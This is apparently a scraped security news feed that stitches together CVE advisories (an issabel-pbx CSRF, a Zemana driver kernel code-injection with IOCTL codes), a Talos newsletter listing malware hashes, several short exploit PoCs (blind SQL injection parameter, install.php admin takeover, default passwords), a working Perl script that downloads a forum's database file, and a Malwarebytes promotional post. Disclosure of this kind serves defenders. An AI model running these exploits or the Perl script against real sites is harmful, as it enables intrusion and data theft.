A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function.

**issabel-pbx 4.0.0-6 - Cross Site Request Forgery (CSRF) to delete any new virtual fax of users**

**Description:** Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows any remote attacker to make the application data not accessible to users by exploiting delete new virtual fax function in the application.

**Vulnerable Product Version:** issabel-pbx 4.0.0-6

**Date:** 10/07/2023

**CVE:** CVE-2023-37598

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.issabel.org/

**Software Link:** https://github.com/IssabelFoundation/issabelPBX

**Tested on:** Windows

**Attack scenario:**  
When this CSRF exploit is hosted somewhere and users open or interact with this exploit in his browser with logged in session of issable application, user's new virtual fax will be deleted automatically from the admin panel/dashboard.

**Steps to reproduce:**

1.  Go to URL: https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1 and login with admin credentials.
    
    ****
2.  Attempt to delete the Virtual Fax and capture the request in burp suite proxy, right-click on the request and go to “Engagement Tools --> Generate CSRF PoC”.
    
    ****
3.  Upon generating the CSRF exploit code shown below, copy the script and save it as html file.
    
4.  Send this file to the already logged-in user and when the user clicks on submit request the Virtual Fax will be deleted as shown in the figure below.
    
    ********

CVE-2023-37598: GitHub - sahiloj/CVE-2023-37598: CSRF vulnerability in issabel-pbx v.4.0.0-6 to delete any new virtual fax of users

Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28.

**CVE-2022-42045****Summary**

We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.

**Details**

The vulnerable function is placed at the offset 0xBF60 from the start of the .text section of amsdk.sys. This function invokes another one at the offset 0xD664. The function at the offset 0xD664 gets 4 arguments:

1.  Target address: address of the function in .hook section with RWX access rights. In our case this argument points to the function at the offset 0x1D0 from the start of .hook sections
2.  Source address: address of a source buffer with user controlled code
3.  Some integer value. 128 in our case
4.  Some address of a some function inside ntoskrnl.exe. This function is invoked just after invoking of the code from argument 2. BUT before it this argument value is increased by the length of a code from argument 2 minus 1. This length is calculated by the embedded to the driver lightweight disassembler. So, after the invoking of a code from argument 2 the control is transferred to the arg\_4 + arg\_2\_length – 1.

IOCTL 0x80002044 calls the function at the offset 0xBF60 (.text section) and allows to fill the stub in .hook section by an arbitrary user controlled code. IOCTL 0x80002014 (read via SCSI) or IOCTL 0x80002018 (write via SCSI) transfers a control to this filled stub.

**Affected products**

At least Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28. These products have the same vulnerable driver but signed with different certificates.

Zemana AntiLogger v2.74.2.664 has the same vulnerability. Vulnerable drivers: zamguard64.sys, zam64.sys.

**Affected operating systems**

64-bit versions of Windows: from Windows 7 to Windows 11

**Mitigation**

Uninstall Zemana or Watchdog Antimalware products. Add driver signatures to blacklist.

CVE-2022-42045: GitHub - ReCryptLLC/CVE-2022-42045

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video.

Thursday, July 13, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Although we can probably largely consider the COVID-19 pandemic “over,” many relics from the peak of lockdown and concerns over the virus are still around in mid-2023. It’s still impossible to get a doctor’s appointment quickly, but many restaurants have embraced al fresco dining and QR codes are back.

At one point I had totally written off QR codes as of 2010-ish, but now they’re all over restaurant menus, cash registers, tip jars and advertising. This started during the pandemic as a touch-free way of interacting with consumers and seems to be sticking around even though the days of indoor seating capacities are over.

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video. But recently I discovered several “novel” ways in which bad guys are trying to capitalize on society’s newfound trust in QR codes.

Two months ago, Bleeping Computer reported on fake parking tickets floating around major U.S. and U.K. cities that had phony QR codes on them designed to trick users into “paying” a parking ticket they didn’t owe. That same week, there were also reports of phony Microsoft Word documents being sent via email to targets that contained QR codes claiming to be from the Chinese Ministry of Finance, thus bypassing traditional email security that usually scan things like links and the body copy in an email itself.

The local CBS station in Tampa Bay, Florida also came across a fake Amazon advertisement in March that claimed to enlist people who received a postcard to test out new products. When opened, the site on the other end of the QR code asked for the target’s personal and contact information.

I figured we’d be past the days of attackers just slapping QR codes onto random things, but I also thought we were done with QR codes altogether three years ago. So this serves as a PSA to not just scan any QR code you see in the wild “just because.”

Or, if you’re unsure about the origins of a QR code, iOS and Android phones will show a snippet of a URL that the QR code is sending the user before you click on it, so it’s important to double-check that the URL is where you intended on heading (ex., amazon.com). Either that or just ask for a paper menu at the restaurant.

**The one big thing**

Cisco Talos has identified multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. This threat appears to target native Chinese speakers, as it searches for Chinese language browsers to hijack. Additionally, the authors are likely Chinese speakers themselves. If installed, the malicious driver can hijack and spy on web traffic, potentially redirecting it to a source of the attacker’s choosing.

**Why do I care?**

This is a concrete example of a recent trend Talos has been following of threat actors taking advantage of a Windows policy loophole that allows the signing and loading of cross-signed kernel mode drivers with signature timestamp prior to July 29, 2015. We have observed over a dozen code-signing certificates with keys and passwords contained in a PFX file hosted on GitHub used in conjunction with these open-source tools. By forging signatures on kernel-mode drivers, attackers can bypass the certificate policies within Windows.

**So now what?**

Microsoft has blocked all certificates discussed in Talos' blogs posted this week and released an advisory on the matter as part of Patch Tuesday. Talos recommends blocking the certificates mentioned in this blog post, as malicious drivers are difficult to detect heuristically and are most effectively blocked based on file hashes or the certificates used to sign them. Comparing the signature timestamp to the compilation date of a driver can sometimes be an effective means of detecting instances of timestamp forging. Specifically, for RedDriver, there are a series of new Cisco Secure product protections in place to detect and block the malicious driver.

**Top security headlines of the week**

The **list of companies affected by the massive MOVEit mass hack continues to grow,** and now includes international hotel chain Radisson and GPS company TomTom. Clop, the ransomware group behind the attack against the MOVEit data transfer software that eventually led to data breaches at more than 100 organizations, added more companies to its leak site this week. Commercial banks Deutsche Bank and Commerzbank are also among the newest victims, with both companies reportedly having clients’ names and account numbers. The parent company of Radisson also confirmed that a “limited number of guest records” were accessed, though it did not provide an exact number. Clop originally used a zero-day vulnerability that’s since been patched to access MOVEit software instances and then steal certain information from users. One threat analyst at New Zealand anti-virus maker Emsisoft estimated that there are now more than 270 businesses affected across the globe, including 17 million individuals. (Tech Crunch, Bloomberg)

With Meta’s new microblogging platform **Threads taking off, users and privacy advocates are criticizing its privacy and data collection policies.** Meta, which is the parent company behind Facebook and Instagram, launched Threads last week to much fanfare and gained millions of new users in the first few hours of the app’s existence. However, the app has yet to launch in the European Union because it violates several GDPR policies. Threads’ privacy policy states the app has access to GPS location, cameras, photos, IP information, the type of device being used and device signals including “Bluetooth signals, nearby Wi-Fi access points, beacons and cell towers.” In general, Meta seems to collect more personal information on Threads users compared to other platforms, though not necessarily more than Facebook and Instagram, Meta’s other major platforms. (The Guardian, CPO Magazine)

Despite major efforts from international governments and the private sector to combat ransomware, **payments to threat actors are set to hit a new record in 2023.** A new report from blockchain company Chainanalysis reports that ransomware victims have paid adversaries $449.1 million in the first six months of this year, after that number didn’t even hit $500 million in 2022. If this pace continues, 2023 would be the second-most profitable year ever for ransomware groups behind 2021. Security researchers believe the dip in 2022 could be contributed to several factors, including Russia’s invasion of Ukraine disrupting some major APT groups and new decryption software from government agencies and private companies that can return victims’ files for free. Chainanalysis analysts state in the report that big-game hunting is largely contributing to this year’s revenue — in these cases, threat actors target major corporations that likely have the funds to pay large, requested ransom payments. (Wired, Bleeping Computer)

**Can’t get enough Talos?**

*   Cisco Talos Reports Microsoft Windows Policy Loophole Being Exploited by Threat Actor
*   Hackers target Chinese-speaking Microsoft users with ‘RedDriver’ browser hijacker
*   Gergana Karadzhova-Dangela wants to send the ladder back down to the next generation of incident responders
*   The growth of commercial spyware based intelligence providers without legal or ethical supervision
*   Microsoft discloses more than 130 vulnerabilities as part of July’s Patch Tuesday, four exploited in the wild

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b4d8d7cbec7fe4c24dcb9b38f6036a58b765efda10c42fce7bbe2b2bf79cd53e  
**MD5:** c585f4faee96a0bec3b0f93f37239008  
**Typical Filename:** stream.txt  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Autoit::211461.in02

QR codes are relevant again for everyone from diners to threat actors

Uncovered issues fall into use-after-free, buffer-overflow, information leak and denial of service vulnerability classes. Some of these could be combined to achieve remote code execution or privilege escalation.

Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation

BloodBank version 1.0 suffers from an insecure direct object reference vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration unauthorized administrative access Vulnerability  || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /admin/subscriber-csv.php[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Insecure Direct Object Reference

Bloly version 1.3 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : Bloly v1.3 Add admin Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bloly.com/download.php                                                                                  || # Dork      : Bloly v1.3 by SoftCab Inc                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload to add new admin login : /blog/install.php .[+] http://127.0.0.1/www/grupomedbrasilcom.br/blog/install.php   ( add new admin login )[+] http://127.0.0.1/www/grupomedbrasil.combr/blog/index.php?action=3   ( Login from Her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bloly 1.3 Add Administrator

BKMobile CMS version 1.5.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : BKMobile-CMS V1.5.0 Blind SQL Injection Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://bekustom.com/                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine[+] http://127.0.0.1/BKMobileCMS/user/full_blog_summary.php?blog_id= <=====| inject Her[+] http://127.0.0.1/BKMobileCMS/admin/ = loginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BKMobile CMS 1.5.0 SQL Injection

Blogator Script version 0.93 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 Reinstall default Password Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /bs_auth.php = default pass is admin[+] http://127.0.0.1/courir33net/group33/blog/bs_auth.php = default pass is adminGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator Script 0.93 Insecure Settings

Blackboard version 2.0.2 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : blackboard v 2.0.2 Database Disclosure Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# blackboard v 2.0.2 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('blackboard v 2.0.2 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Blackboard 2.0.2 Database Disclosure

Categories: Business
The test evaluates products against the latest techniques used by data stealers and ransomware.



(Read more...)




The post Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment appeared first on Malwarebytes Labs.

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two **Advanced** awards **for the ability of our consumer and business products to protect against the latest attack techniques.**

Let’s take a deeper dive into the test and the results.

**Advanced Threat Protection test breakdown**

AV-Test's bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the "Inline Execute Assembly" technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

**In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top "Advanced" rating for detecting 10/10 samples and receiving the full 35/35 points.**

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

**Advanced test: Enterprise results**

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.

******Advanced test: Consumer results**

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

**The foundation for superior Endpoint Detection and Response (EDR)**

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it's the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment

Tag

#windows